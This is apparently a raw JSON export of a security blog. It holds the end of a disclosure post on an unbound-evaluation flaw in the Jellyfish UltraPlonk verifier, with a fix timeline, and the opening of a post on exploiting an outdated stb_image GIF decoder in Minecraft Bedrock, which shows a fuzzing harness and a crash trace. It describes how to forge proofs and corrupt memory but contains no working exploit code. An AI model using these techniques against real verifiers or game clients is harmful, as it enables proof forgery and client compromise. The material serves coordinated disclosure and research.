Jellyfish",{"type":28,"tag":29,"props":146416,"children":146417},{},[146418,146420,146427],{"type":33,"value":146419},"While investigating PLONK implementations, we found a similar vulnerability in ",{"type":28,"tag":87,"props":146421,"children":146424},{"href":146422,"rel":146423},"https://github.com/EspressoSystems/jellyfish/",[91],[146425],{"type":33,"value":146426},"jf-plonk",{"type":33,"value":146428}," by Espresso Systems. The exact mechanism is different, but the exploitation also boils down to variables that are used in the final check not being cryptographically bound.",{"type":28,"tag":29,"props":146430,"children":146431},{},[146432,146434,146441,146443,146454,146456,146481,146483,146508],{"type":33,"value":146433},"Jellyfish implements UltraPlonk, which extends standard PLONK with ",{"type":28,"tag":87,"props":146435,"children":146438},{"href":146436,"rel":146437},"https://eprint.iacr.org/2020/315",[91],[146439],{"type":33,"value":146440},"Plookup",{"type":33,"value":146442}," lookup arguments. Plookup adds 15 polynomial evaluations to the proof. The function ",{"type":28,"tag":87,"props":146444,"children":146447},{"href":146445,"rel":146446},"https://github.com/EspressoSystems/jellyfish/blob/83e62ed43140d251f8a972033fdd9ddb717c66d7/plonk/src/transcript/mod.rs#L156-L166",[91],[146448],{"type":28,"tag":98,"props":146449,"children":146451},{"className":146450},[],[146452],{"type":33,"value":146453},"append_plookup_evaluations",{"type":33,"value":146455}," was supposed to add all 15 to the Fiat-Shamir transcript before the batching challenge ",{"type":28,"tag":98,"props":146457,"children":146459},{"className":146458},[3652,3653],[146460],{"type":28,"tag":116,"props":146461,"children":146463},{"className":146462},[3658],[146464],{"type":28,"tag":116,"props":146465,"children":146467},{"className":146466,"ariaHidden":3664},[3663],[146468],{"type":28,"tag":116,"props":146469,"children":146471},{"className":146470},[3669],[146472,146476],{"type":28,"tag":116,"props":146473,"children":146475},{"className":146474,"style":110501},[3674],[],{"type":28,"tag":116,"props":146477,"children":146479},{"className":146478,"style":93149},[3680,21251],[146480],{"type":33,"value":113564},{"type":33,"value":146482}," is derived. Instead, it only added 6 of the 15, and the remaining 9 evaluations are used in the batched verification check but don't influence ",{"type":28,"tag":98,"props":146484,"children":146486},{"className":146485},[3652,3653],[146487],{"type":28,"tag":116,"props":146488,"children":146490},{"className":146489},[3658],[146491],{"type":28,"tag":116,"props":146492,"children":146494},{"className":146493,"ariaHidden":3664},[3663],[146495],{"type":28,"tag":116,"props":146496,"children":146498},{"className":146497},[3669],[146499,146503],{"type":28,"tag":116,"props":146500,"children":146502},{"className":146501,"style":110501},[3674],[],{"type":28,"tag":116,"props":146504,"children":146506},{"className":146505,"style":93149},[3680,21251],[146507],{"type":33,"value":113564},{"type":33,"value":146509},", so the prover can adjust them after the fact to make the check pass.",{"type":28,"tag":29,"props":146511,"children":146512},{},[146513,146515,146521,146523,146529],{"type":33,"value":146514},"The attack requires modifying a single evaluation (",{"type":28,"tag":98,"props":146516,"children":146518},{"className":146517},[],[146519],{"type":33,"value":146520},"key_table_next_eval",{"type":33,"value":146522},") by ",{"type":28,"tag":98,"props":146524,"children":146526},{"className":146525},[],[146527],{"type":33,"value":146528},"delta / (u * v^3)",{"type":33,"value":146530}," to close the gap between the true and expected batched evaluation, which, like the Dusk exploit, reduces to a single field division.",{"type":28,"tag":29,"props":146532,"children":146533},{},[146534,146536,146543,146545,146556],{"type":33,"value":146535},"To our knowledge, Jellyfish's UltraPlonk mode is not currently deployed in production. ",{"type":28,"tag":87,"props":146537,"children":146540},{"href":146538,"rel":146539},"https://github.com/EspressoSystems/jellyfish/pull/867",[91],[146541],{"type":33,"value":146542},"PR #867",{"type":33,"value":146544}," fixed the issue and was tagged as ",{"type":28,"tag":87,"props":146546,"children":146549},{"href":146547,"rel":146548},"https://github.com/EspressoSystems/jellyfish/tree/jf-plonk-v0.8.0",[91],[146550],{"type":28,"tag":98,"props":146551,"children":146553},{"className":146552},[],[146554],{"type":33,"value":146555},"jf-plonk-v0.8.0",{"type":33,"value":146557}," on March 18, 2026.",{"type":28,"tag":18457,"props":146559,"children":146560},{},[],{"type":28,"tag":63,"props":146562,"children":146564},{"id":146563},"toward-standardization",[146565],{"type":33,"value":146566},"Toward standardization",{"type":28,"tag":29,"props":146568,"children":146569},{},[146570,146572,146579],{"type":33,"value":146571},"The fact that two independent PLONK implementations contain the same class of bug, and that ",{"type":28,"tag":87,"props":146573,"children":146576},{"href":146574,"rel":146575},"https://osec.io/blog/2026-03-03-zkvms-unfaithful-claims/",[91],[146577],{"type":33,"value":146578},"similar patterns appear across zkVMs",{"type":33,"value":146580},", suggests this isn't a problem that individual audits alone can solve. The check described above (diff \"evaluations used\" against \"evaluations bound\") is mechanical and could be built into development tooling, CI pipelines, or standardized PLONK verification specifications.",{"type":28,"tag":29,"props":146582,"children":146583},{},[146584],{"type":33,"value":146585},"We're in early discussions with the Dusk team and other stakeholders about what a PLONK standardization effort could look like: a curve-agnostic, backend-agnostic specification of the verification protocol that makes invariants like evaluation binding explicit and checkable.",{"type":28,"tag":29,"props":146587,"children":146588},{},[146589],{"type":33,"value":146590},"The status quo, where each team implements their own PLONK variant from the paper and hopes the auditor catches what they missed, is fragile. A shared, well-reviewed verification spec would reduce the surface area for these bugs and give auditors a concrete checklist to verify against.",{"type":28,"tag":63,"props":146592,"children":146593},{"id":60442},[146594],{"type":33,"value":146595},"Disclosure timeline",{"type":28,"tag":55363,"props":146597,"children":146598},{},[146599,146615],{"type":28,"tag":122611,"props":146600,"children":146601},{},[146602],{"type":28,"tag":122615,"props":146603,"children":146604},{},[146605,146610],{"type":28,"tag":122619,"props":146606,"children":146607},{},[146608],{"type":33,"value":146609},"Date",{"type":28,"tag":122619,"props":146611,"children":146612},{},[146613],{"type":33,"value":146614},"Event",{"type":28,"tag":122639,"props":146616,"children":146617},{},[146618,146631,146644,146656,146682,146702],{"type":28,"tag":122615,"props":146619,"children":146620},{},[146621,146626],{"type":28,"tag":122646,"props":146622,"children":146623},{},[146624],{"type":33,"value":146625},"2026-02-13",{"type":28,"tag":122646,"props":146627,"children":146628},{},[146629],{"type":33,"value":146630},"Dusk vulnerability reported",{"type":28,"tag":122615,"props":146632,"children":146633},{},[146634,146639],{"type":28,"tag":122646,"props":146635,"children":146636},{},[146637],{"type":33,"value":146638},"2026-02-14",{"type":28,"tag":122646,"props":146640,"children":146641},{},[146642],{"type":33,"value":146643},"Dusk acknowledged",{"type":28,"tag":122615,"props":146645,"children":146646},{},[146647,146651],{"type":28,"tag":122646,"props":146648,"children":146649},{},[146650],{"type":33,"value":146638},{"type":28,"tag":122646,"props":146652,"children":146653},{},[146654],{"type":33,"value":146655},"Dusk fix committed",{"type":28,"tag":122615,"props":146657,"children":146658},{},[146659,146664],{"type":28,"tag":122646,"props":146660,"children":146661},{},[146662],{"type":33,"value":146663},"2026-02-27",{"type":28,"tag":122646,"props":146665,"children":146666},{},[146667,146669,146680],{"type":33,"value":146668},"Public ",{"type":28,"tag":87,"props":146670,"children":146673},{"href":146671,"rel":146672},"https://github.com/dusk-network/rusk/releases/tag/dusk-rusk-1.6.0",[91],[146674],{"type":28,"tag":98,"props":146675,"children":146677},{"className":146676},[],[146678],{"type":33,"value":146679},"dusk-rusk-1.6.0",{"type":33,"value":146681}," release published",{"type":28,"tag":122615,"props":146683,"children":146684},{},[146685,146690],{"type":28,"tag":122646,"props":146686,"children":146687},{},[146688],{"type":33,"value":146689},"2026-03-16",{"type":28,"tag":122646,"props":146691,"children":146692},{},[146693,146695,146701],{"type":33,"value":146694},"Jellyfish fix PR opened (",{"type":28,"tag":87,"props":146696,"children":146698},{"href":146538,"rel":146697},[91],[146699],{"type":33,"value":146700},"#867",{"type":33,"value":1829},{"type":28,"tag":122615,"props":146703,"children":146704},{},[146705,146710],{"type":28,"tag":122646,"props":146706,"children":146707},{},[146708],{"type":33,"value":146709},"2026-03-18",{"type":28,"tag":122646,"props":146711,"children":146712},{},[146713,146715,146720,146722],{"type":33,"value":146714},"Jellyfish fix merged in ",{"type":28,"tag":87,"props":146716,"children":146718},{"href":146538,"rel":146717},[91],[146719],{"type":33,"value":146700},{"type":33,"value":146721}," and tagged as ",{"type":28,"tag":87,"props":146723,"children":146725},{"href":146547,"rel":146724},[91],[146726],{"type":28,"tag":98,"props":146727,"children":146729},{"className":146728},[],[146730],{"type":33,"value":146555},{"type":28,"tag":63,"props":146732,"children":146734},{"id":146733},"acknowledgements",[146735],{"type":33,"value":146736},"Acknowledgements",{"type":28,"tag":29,"props":146738,"children":146739},{},[146740],{"type":33,"value":146741},"We thank the Dusk team for responding within a day, coordinating the fix transparently, and engaging on the broader standardization question. We also thank the Espresso Systems team for turning around the Jellyfish patch in under a week.",{"title":7,"searchDepth":256,"depth":256,"links":146743},[146744,146751,146752,146753,146754,146755,146756,146757,146758,146759,146760,146761],{"id":141561,"depth":256,"text":141564,"children":146745},[146746,146747,146748,146749,146750],{"id":141586,"depth":293,"text":141589},{"id":142389,"depth":293,"text":142392},{"id":143587,"depth":293,"text":143590},{"id":143617,"depth":293,"text":143620},{"id":143898,"depth":293,"text":143901},{"id":144631,"depth":256,"text":144634},{"id":144769,"depth":256,"text":144772},{"id":89919,"depth":256,"text":145400},{"id":145999,"depth":256,"text":146002},{"id":146136,"depth":256,"text":146139},{"id":146251,"depth":256,"text":146254},{"id":146344,"depth":256,"text":146347},{"id":146411,"depth":256,"text":146414},{"id":146563,"depth":256,"text":146566},{"id":60442,"depth":256,"text":146595},{"id":146733,"depth":256,"text":146736},"content:blog:2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk.md","blog/2026-04-30-unverified-evaluations-dusk-plonk",{"_path":146766,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":146767,"description":146768,"date":146769,"author":123270,"image":146770,"isFeatured":19,"onBlogPage":19,"tags":146772,"body":146775,"_type":2534,"_id":156154,"_source":2536,"_file":156155,"_stem":156156,"_extension":2539},"/blog/2026-06-02-minecraft-heap-overflow-to-rce","Pwning Minecraft: 4-Byte Heap Overflow to RCE","We achieved RCE in Minecraft Bedrock, turning a 4-byte heap overflow into complete client compromise. Learn how a universal, Bedrock-specific technique is used to bypass ASLR and achieve arbitrary read/write primitives.","2026-06-02T12:00:00.000Z",{"src":146771,"width":17,"height":18},"/posts/minecraft-heap-overflow-to-rce/title.png",[146773,146774],"minecraft","rce",{"type":25,"children":146776,"toc":156131},[146777,146782,146787,146792,146798,146803,146822,146827,146833,146838,146843,146849,146854,146859,146864,146870,146875,146880,146886,146906,146918,146925,146947,146961,146968,146974,146984,147004,147009,147015,147028,147373,147378,147386,147392,147411,147719,147747,147790,147802,147810,147815,148284,148303,148324,148666,148690,148962,148986,149013,149222,149241,149249,149268,149274,149336,149339,149361,149365,149370,149375,149381,149386,149400,149406,149420,149426,149439,149444,149452,149457,149463,149484,149492,149505,149508,149513,149527,149532,149537,149543,149548,149571,149576,149582,149587,149599,149611,149725,149745,149750,149755,149761,149766,149786,150401,150414,151487,151492,151500,151505,151511,151516,151524,151537,151542,151547,151554,151567,151572,151579,151634,151654,151661,151680,151687,151690,151695,151700,151706,151718,151731,151739,151810,151821,151855,151863,151868,151873,151879,151891,151910,151922,151927,151935,151954,151962,151981,151989,152015,152023,152028,152036,152041,152049,152052,152057,152062,152068,152081,152099,152137,152167,152175,152180,152186,152191,152196,152202,152214,152383,152395,152403,152408,152415,152420,152481,152528,152540,152545,152571,152645,152683,152688,152696,152717,152722,152748,152782,152835,152882,152888,152907,152939,152947,153050,153121,153127,153153,153160,153165,153172,153177,153418,153444,153449,153497,153502,153508,153540,153552,153584,153592,153631,153639,153644,153652,153657,153665,153677,153685,153697,153705,153717,153737,153743,153763,153780,153788,153800,153808,153827,153832,153840,153845,153853,153879,153890,153897,153902,153910,153915,153923,153928,153936,153941,153949,153954,153962,153967,153975,154016,154023,154028,154036,154041,154049,154054,154062,154067,154072,154080,154085,154093,154119,154127,154153,154161,154166,154174,154179,154187,154195,154200,154208,154213,154221,154224,154235,154269,154287,154295,154315,154321,154340,154398,154418,154426,154429,154468,154528,154533,154539,154552,154560,154612,154651,154659,154692,154695,154715,154723,154729,154734,154742,154782,154823,154843,154848,154853,154871,154877,154882,154901,154962,154970,154996,155002,155022,155027,155032,155039,155104,155109,155116,155137,155142,155154,155160,155193,155200,155205,155233,155240,155296,155308,155315,155376,155395,155401,155435,155456,155483,155491,155544,155614,155620,155640,155683,155688,156086,156092,156097,156108,156112,156117,156122,156127],{"type":28,"tag":41,"props":146778,"children":146780},{"id":146779},"pwning-minecraft-4-byte-heap-overflow-to-rce",[146781],{"type":33,"value":146767},{"type":28,"tag":29,"props":146783,"children":146784},{},[146785],{"type":33,"value":146786},"In this post, we explore how we achieved remote code execution with a 4-byte heap overflow on a target with default modern protections - working around Windows' Control Flow Guard and ASLR on a remote client connecting to a malicious server, without any information leaks from the client.",{"type":28,"tag":29,"props":146788,"children":146789},{},[146790],{"type":33,"value":146791},"We present a powerful technique, specific to our target, which can be used to achieve RCE for bug types such as double frees, use-after-frees, and any heap overflow of at least 3 bytes.",{"type":28,"tag":63,"props":146793,"children":146795},{"id":146794},"the-target",[146796],{"type":33,"value":146797},"The Target",{"type":28,"tag":29,"props":146799,"children":146800},{},[146801],{"type":33,"value":146802},"Minecraft is one of the most popular games of all time, with millions of daily players and a large count of community servers actively played by thousands - this, and the lack of research in this area made it an intriguing target.",{"type":28,"tag":29,"props":146804,"children":146805},{},[146806,146808,146813,146815,146820],{"type":33,"value":146807},"There are two main editions: ",{"type":28,"tag":4995,"props":146809,"children":146810},{},[146811],{"type":33,"value":146812},"Minecraft Java Edition",{"type":33,"value":146814},", written in Java and available on desktop platforms (Windows, macOS, Linux), and ",{"type":28,"tag":4995,"props":146816,"children":146817},{},[146818],{"type":33,"value":146819},"Minecraft Bedrock Edition",{"type":33,"value":146821},", written largely in C++ and used on consoles like PlayStation and Xbox, mobile platforms, and also available on Windows.",{"type":28,"tag":29,"props":146823,"children":146824},{},[146825],{"type":33,"value":146826},"Given that we were interested in memory corruption bugs we chose the Bedrock Edition. Specifically, we decided to explore the Windows version as the debugging setup was the one we were most familiar with.",{"type":28,"tag":75,"props":146828,"children":146830},{"id":146829},"choice-of-context",[146831],{"type":33,"value":146832},"Choice of Context",{"type":28,"tag":29,"props":146834,"children":146835},{},[146836],{"type":33,"value":146837},"We focused on a malicious-server -> connecting-client threat model because a server controls many inputs, giving a larger, easier-to-reach attack surface than client->client attacks.",{"type":28,"tag":29,"props":146839,"children":146840},{},[146841],{"type":33,"value":146842},"A server can control a large state which includes: the whole world and all entities within, each connected client state such as the position and view angles, and server-provided resource packs which connecting clients will download and parse.",{"type":28,"tag":75,"props":146844,"children":146846},{"id":146845},"resource-packs",[146847],{"type":33,"value":146848},"Resource Packs",{"type":28,"tag":29,"props":146850,"children":146851},{},[146852],{"type":33,"value":146853},"Resource packs are a way to change the look of Minecraft. They specify custom textures and sounds of blocks and entities, while also controlling client-side entity animations.",{"type":28,"tag":29,"props":146855,"children":146856},{},[146857],{"type":33,"value":146858},"A server can provide a custom resource pack to the client upon connecting, which the client can optionally download and load. If the server set the resource pack to mandatory, clients that refuse the resource pack aren't allowed to connect.",{"type":28,"tag":29,"props":146860,"children":146861},{},[146862],{"type":33,"value":146863},"This widens the attack surface to include image and audio parsing - both historically common sources of memory-corruption bugs.",{"type":28,"tag":63,"props":146865,"children":146867},{"id":146866},"finding-a-memory-corruption-bug",[146868],{"type":33,"value":146869},"Finding a Memory Corruption Bug",{"type":28,"tag":29,"props":146871,"children":146872},{},[146873],{"type":33,"value":146874},"Given that Minecraft is a large, closed-source C++ codebase, we wanted to avoid unnecessary reverse engineering; therefore we first looked at the image-parsing code.",{"type":28,"tag":29,"props":146876,"children":146877},{},[146878],{"type":33,"value":146879},"Image parsing is interesting because programs rarely reimplement decoders, they typically use third-party libraries. We hoped Minecraft used an open-source library we could read, which is much easier than reversing a native decoder.",{"type":28,"tag":75,"props":146881,"children":146883},{"id":146882},"locating-image-parsing-code",[146884],{"type":33,"value":146885},"Locating Image Parsing Code",{"type":28,"tag":29,"props":146887,"children":146888},{},[146889,146891,146897,146898,146904],{"type":33,"value":146890},"The simplest way to find code that handles image parsing is to search for expected strings such as ",{"type":28,"tag":98,"props":146892,"children":146894},{"className":146893},[],[146895],{"type":33,"value":146896},"PNG",{"type":33,"value":12800},{"type":28,"tag":98,"props":146899,"children":146901},{"className":146900},[],[146902],{"type":33,"value":146903},"GIF",{"type":33,"value":146905}," and look for error logging or other messages that use those substrings.",{"type":28,"tag":29,"props":146907,"children":146908},{},[146909,146911,146916],{"type":33,"value":146910},"Searching for the string ",{"type":28,"tag":98,"props":146912,"children":146914},{"className":146913},[],[146915],{"type":33,"value":146903},{"type":33,"value":146917}," returned some interesting results:",{"type":28,"tag":29,"props":146919,"children":146920},{},[146921],{"type":28,"tag":206,"props":146922,"children":146924},{"alt":50198,"src":146923},"/posts/minecraft-heap-overflow-to-rce/image1.png",[],{"type":28,"tag":29,"props":146926,"children":146927},{},[146928,146930,146937,146939,146946],{"type":33,"value":146929},"Most - if not all - of these results look like they are used by an image parser. We searched online for the strings and found they match the exact strings used in ",{"type":28,"tag":87,"props":146931,"children":146934},{"href":146932,"rel":146933},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h",[91],[146935],{"type":33,"value":146936},"stb_image.h",{"type":33,"value":146938},". For an example: usage of ",{"type":28,"tag":87,"props":146940,"children":146943},{"href":146941,"rel":146942},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h#L6855",[91],[146944],{"type":33,"value":146945},"bad Image Descriptor",{"type":33,"value":141},{"type":28,"tag":29,"props":146948,"children":146949},{},[146950,146952,146959],{"type":33,"value":146951},"To confirm that the library code was actually used to load images, we created a simple resource pack containing a single GIF image, set a breakpoint at ",{"type":28,"tag":87,"props":146953,"children":146956},{"href":146954,"rel":146955},"https://github.com/nothings/stb/blob/fede005abaf93d9d7f3a679d1999b2db341b360f/stb_image.h#L6778",[91],[146957],{"type":33,"value":146958},"stbi__gif_load_next",{"type":33,"value":146960},", and loaded the resource pack - this confirmed its usage:",{"type":28,"tag":29,"props":146962,"children":146963},{},[146964],{"type":28,"tag":206,"props":146965,"children":146967},{"alt":50198,"src":146966},"/posts/minecraft-heap-overflow-to-rce/image2.png",[],{"type":28,"tag":75,"props":146969,"children":146971},{"id":146970},"stb-image-library",[146972],{"type":33,"value":146973},"STB Image Library",{"type":28,"tag":29,"props":146975,"children":146976},{},[146977,146982],{"type":28,"tag":98,"props":146978,"children":146980},{"className":146979},[],[146981],{"type":33,"value":146936},{"type":33,"value":146983}," had a number of memory corruption bugs historically, but the known ones were fixed in later revisions. Finding a new 0-day in this library looked relatively hard because it’s widely used and has been well-scrutinized at that point.",{"type":28,"tag":29,"props":146985,"children":146986},{},[146987,146989,146994,146996,147003],{"type":33,"value":146988},"Instead, we checked whether the version used by Minecraft was outdated - if so, previously reported bugs might apply. We inspected ",{"type":28,"tag":98,"props":146990,"children":146992},{"className":146991},[],[146993],{"type":33,"value":146936},{"type":33,"value":146995}," commits and checked whether those changes were present in the Minecraft executable. Eventually, we found that Minecraft was using a fairly old revision - some commit prior to ",{"type":28,"tag":87,"props":146997,"children":147000},{"href":146998,"rel":146999},"https://github.com/nothings/stb/commit/f1f077b2722f55e158cba020f0312ee2d13c463a",[91],[147001],{"type":33,"value":147002},"f1f077b2722f55e158cba020f0312ee2d13c463a",{"type":33,"value":141},{"type":28,"tag":29,"props":147005,"children":147006},{},[147007],{"type":33,"value":147008},"At the time, the commit was already 6 years old, while there were public reports for memory corruption bugs after it. We looked through the reported bugs but didn't find an interesting and applicable one, so we decided to run a simple fuzzing harness on this commit.",{"type":28,"tag":443,"props":147010,"children":147012},{"id":147011},"fuzzing",[147013],{"type":33,"value":147014},"Fuzzing",{"type":28,"tag":29,"props":147016,"children":147017},{},[147018,147020,147027],{"type":33,"value":147019},"The fuzzer consisted of a very simple ",{"type":28,"tag":87,"props":147021,"children":147024},{"href":147022,"rel":147023},"https://github.com/AFLplusplus/AFLplusplus",[91],[147025],{"type":33,"value":147026},"AFL++",{"type":33,"value":26396},{"type":28,"tag":234,"props":147029,"children":147031},{"code":147030,"language":1797,"meta":7,"className":16176,"style":7},"#define STB_IMAGE_IMPLEMENTATION\n#include \"./stb/stb_image.h\"\n\nint main(int argc, char **argv) {\n    int x, y, comp;\n    unsigned char *ret;\n\n    if (argc != 2) {\n        return 1;\n    }\n\n    ret = stbi_load(argv[1], &x, &y, &comp, 0);\n    if (ret == NULL) {\n        return 1;\n    }\n    \n    stbi_image_free(ret);\n\n    return 0;\n}\n",[147032],{"type":28,"tag":98,"props":147033,"children":147034},{"__ignoreMap":7},[147035,147048,147060,147067,147113,147125,147146,147153,147177,147192,147199,147206,147278,147302,147317,147324,147331,147344,147351,147366],{"type":28,"tag":116,"props":147036,"children":147037},{"class":245,"line":246},[147038,147043],{"type":28,"tag":116,"props":147039,"children":147040},{"style":260},[147041],{"type":33,"value":147042},"#define",{"type":28,"tag":116,"props":147044,"children":147045},{"style":282},[147046],{"type":33,"value":147047}," STB_IMAGE_IMPLEMENTATION\n",{"type":28,"tag":116,"props":147049,"children":147050},{"class":245,"line":256},[147051,147055],{"type":28,"tag":116,"props":147052,"children":147053},{"style":260},[147054],{"type":33,"value":90033},{"type":28,"tag":116,"props":147056,"children":147057},{"style":563},[147058],{"type":33,"value":147059}," \"./stb/stb_image.h\"\n",{"type":28,"tag":116,"props":147061,"children":147062},{"class":245,"line":293},[147063],{"type":28,"tag":116,"props":147064,"children":147065},{"emptyLinePlaceholder":19},[147066],{"type":33,"value":1044},{"type":28,"tag":116,"props":147068,"children":147069},{"class":245,"line":361},[147070,147074,147078,147082,147086,147091,147095,147100,147104,147109],{"type":28,"tag":116,"props":147071,"children":147072},{"style":376},[147073],{"type":33,"value":18710},{"type":28,"tag":116,"props":147075,"children":147076},{"style":282},[147077],{"type":33,"value":1063},{"type":28,"tag":116,"props":147079,"children":147080},{"style":266},[147081],{"type":33,"value":313},{"type":28,"tag":116,"props":147083,"children":147084},{"style":376},[147085],{"type":33,"value":18710},{"type":28,"tag":116,"props":147087,"children":147088},{"style":272},[147089],{"type":33,"value":147090}," argc",{"type":28,"tag":116,"props":147092,"children":147093},{"style":266},[147094],{"type":33,"value":825},{"type":28,"tag":116,"props":147096,"children":147097},{"style":376},[147098],{"type":33,"value":147099},"char",{"type":28,"tag":116,"props":147101,"children":147102},{"style":370},[147103],{"type":33,"value":89499},{"type":28,"tag":116,"props":147105,"children":147106},{"style":272},[147107],{"type":33,"value":147108},"argv",{"type":28,"tag":116,"props":147110,"children":147111},{"style":266},[147112],{"type":33,"value":844},{"type":28,"tag":116,"props":147114,"children":147115},{"class":245,"line":387},[147116,147120],{"type":28,"tag":116,"props":147117,"children":147118},{"style":376},[147119],{"type":33,"value":18740},{"type":28,"tag":116,"props":147121,"children":147122},{"style":266},[147123],{"type":33,"value":147124}," x, y, comp;\n",{"type":28,"tag":116,"props":147126,"children":147127},{"class":245,"line":400},[147128,147133,147137,147141],{"type":28,"tag":116,"props":147129,"children":147130},{"style":376},[147131],{"type":33,"value":147132},"    unsigned",{"type":28,"tag":116,"props":147134,"children":147135},{"style":376},[147136],{"type":33,"value":58667},{"type":28,"tag":116,"props":147138,"children":147139},{"style":370},[147140],{"type":33,"value":9484},{"type":28,"tag":116,"props":147142,"children":147143},{"style":266},[147144],{"type":33,"value":147145},"ret;\n",{"type":28,"tag":116,"props":147147,"children":147148},{"class":245,"line":614},[147149],{"type":28,"tag":116,"props":147150,"children":147151},{"emptyLinePlaceholder":19},[147152],{"type":33,"value":1044},{"type":28,"tag":116,"props":147154,"children":147155},{"class":245,"line":631},[147156,147160,147165,147169,147173],{"type":28,"tag":116,"props":147157,"children":147158},{"style":260},[147159],{"type":33,"value":11947},{"type":28,"tag":116,"props":147161,"children":147162},{"style":266},[147163],{"type":33,"value":147164}," (argc ",{"type":28,"tag":116,"props":147166,"children":147167},{"style":370},[147168],{"type":33,"value":15350},{"type":28,"tag":116,"props":147170,"children":147171},{"style":350},[147172],{"type":33,"value":7606},{"type":28,"tag":116,"props":147174,"children":147175},{"style":266},[147176],{"type":33,"value":844},{"type":28,"tag":116,"props":147178,"children":147179},{"class":245,"line":665},[147180,147184,147188],{"type":28,"tag":116,"props":147181,"children":147182},{"style":260},[147183],{"type":33,"value":15405},{"type":28,"tag":116,"props":147185,"children":147186},{"style":350},[147187],{"type":33,"value":4192},{"type":28,"tag":116,"props":147189,"children":147190},{"style":266},[147191],{"type":33,"value":384},{"type":28,"tag":116,"props":147193,"children":147194},{"class":245,"line":713},[147195],{"type":28,"tag":116,"props":147196,"children":147197},{"style":266},[147198],{"type":33,"value":3025},{"type":28,"tag":116,"props":147200,"children":147201},{"class":245,"line":750},[147202],{"type":28,"tag":116,"props":147203,"children":147204},{"emptyLinePlaceholder":19},[147205],{"type":33,"value":1044},{"type":28,"tag":116,"props":147207,"children":147208},{"class":245,"line":779},[147209,147214,147218,147223,147227,147231,147235,147239,147243,147247,147252,147256,147261,147265,147270,147274],{"type":28,"tag":116,"props":147210,"children":147211},{"style":266},[147212],{"type":33,"value":147213},"    ret ",{"type":28,"tag":116,"props":147215,"children":147216},{"style":370},[147217],{"type":33,"value":373},{"type":28,"tag":116,"props":147219,"children":147220},{"style":282},[147221],{"type":33,"value":147222}," stbi_load",{"type":28,"tag":116,"props":147224,"children":147225},{"style":266},[147226],{"type":33,"value":313},{"type":28,"tag":116,"props":147228,"children":147229},{"style":272},[147230],{"type":33,"value":147108},{"type":28,"tag":116,"props":147232,"children":147233},{"style":266},[147234],{"type":33,"value":347},{"type":28,"tag":116,"props":147236,"children":147237},{"style":350},[147238],{"type":33,"value":1824},{"type":28,"tag":116,"props":147240,"children":147241},{"style":266},[147242],{"type":33,"value":22723},{"type":28,"tag":116,"props":147244,"children":147245},{"style":370},[147246],{"type":33,"value":2780},{"type":28,"tag":116,"props":147248,"children":147249},{"style":266},[147250],{"type":33,"value":147251},"x, ",{"type":28,"tag":116,"props":147253,"children":147254},{"style":370},[147255],{"type":33,"value":2780},{"type":28,"tag":116,"props":147257,"children":147258},{"style":266},[147259],{"type":33,"value":147260},"y, ",{"type":28,"tag":116,"props":147262,"children":147263},{"style":370},[147264],{"type":33,"value":2780},{"type":28,"tag":116,"props":147266,"children":147267},{"style":266},[147268],{"type":33,"value":147269},"comp, ",{"type":28,"tag":116,"props":147271,"children":147272},{"style":350},[147273],{"type":33,"value":353},{"type":28,"tag":116,"props":147275,"children":147276},{"style":266},[147277],{"type":33,"value":895},{"type":28,"tag":116,"props":147279,"children":147280},{"class":245,"line":796},[147281,147285,147290,147294,147298],{"type":28,"tag":116,"props":147282,"children":147283},{"style":260},[147284],{"type":33,"value":11947},{"type":28,"tag":116,"props":147286,"children":147287},{"style":266},[147288],{"type":33,"value":147289}," (ret ",{"type":28,"tag":116,"props":147291,"children":147292},{"style":370},[147293],{"type":33,"value":2340},{"type":28,"tag":116,"props":147295,"children":147296},{"style":376},[147297],{"type":33,"value":127383},{"type":28,"tag":116,"props":147299,"children":147300},{"style":266},[147301],{"type":33,"value":844},{"type":28,"tag":116,"props":147303,"children":147304},{"class":245,"line":847},[147305,147309,147313],{"type":28,"tag":116,"props":147306,"children":147307},{"style":260},[147308],{"type":33,"value":15405},{"type":28,"tag":116,"props":147310,"children":147311},{"style":350},[147312],{"type":33,"value":4192},{"type":28,"tag":116,"props":147314,"children":147315},{"style":266},[147316],{"type":33,"value":384},{"type":28,"tag":116,"props":147318,"children":147319},{"class":245,"line":898},[147320],{"type":28,"tag":116,"props":147321,"children":147322},{"style":266},[147323],{"type":33,"value":3025},{"type":28,"tag":116,"props":147325,"children":147326},{"class":245,"line":907},[147327],{"type":28,"tag":116,"props":147328,"children":147329},{"style":266},[147330],{"type":33,"value":61405},{"type":28,"tag":116,"props":147332,"children":147333},{"class":245,"line":981},[147334,147339],{"type":28,"tag":116,"props":147335,"children":147336},{"style":282},[147337],{"type":33,"value":147338},"    stbi_image_free",{"type":28,"tag":116,"props":147340,"children":147341},{"style":266},[147342],{"type":33,"value":147343},"(ret);\n",{"type":28,"tag":116,"props":147345,"children":147346},{"class":245,"line":1011},[147347],{"type":28,"tag":116,"props":147348,"children":147349},{"emptyLinePlaceholder":19},[147350],{"type":33,"value":1044},{"type":28,"tag":116,"props":147352,"children":147353},{"class":245,"line":1029},[147354,147358,147362],{"type":28,"tag":116,"props":147355,"children":147356},{"style":260},[147357],{"type":33,"value":393},{"type":28,"tag":116,"props":147359,"children":147360},{"style":350},[147361],{"type":33,"value":2718},{"type":28,"tag":116,"props":147363,"children":147364},{"style":266},[147365],{"type":33,"value":384},{"type":28,"tag":116,"props":147367,"children":147368},{"class":245,"line":1038},[147369],{"type":28,"tag":116,"props":147370,"children":147371},{"style":266},[147372],{"type":33,"value":406},{"type":28,"tag":29,"props":147374,"children":147375},{},[147376],{"type":33,"value":147377},"And soon after starting the fuzzer it found an interesting bug:",{"type":28,"tag":234,"props":147379,"children":147381},{"code":147380},"=================================================================\n==1087247==ERROR: AddressSanitizer: heap-buffer-overflow on address ...\nWRITE of size 1 at 0x52d000008800 thread T0\n    #0 0x655424309a49 in stbi__out_gif_code stb/stb_image.h:6233\n    #1 0x655424309888 in stbi__out_gif_code stb/stb_image.h:6227\n    #2 0x655424309888 in stbi__out_gif_code stb/stb_image.h:6227\n    [...]\n    #19 0x65542430a697 in stbi__process_gif_raster stb/stb_image.h:6326\n    #20 0x65542430b936 in stbi__gif_load_next stb/stb_image.h:6443\n    #21 0x65542430c90e in stbi__gif_load stb/stb_image.h:6573\n    #22 0x6554242fc0d4 in stbi__load_main 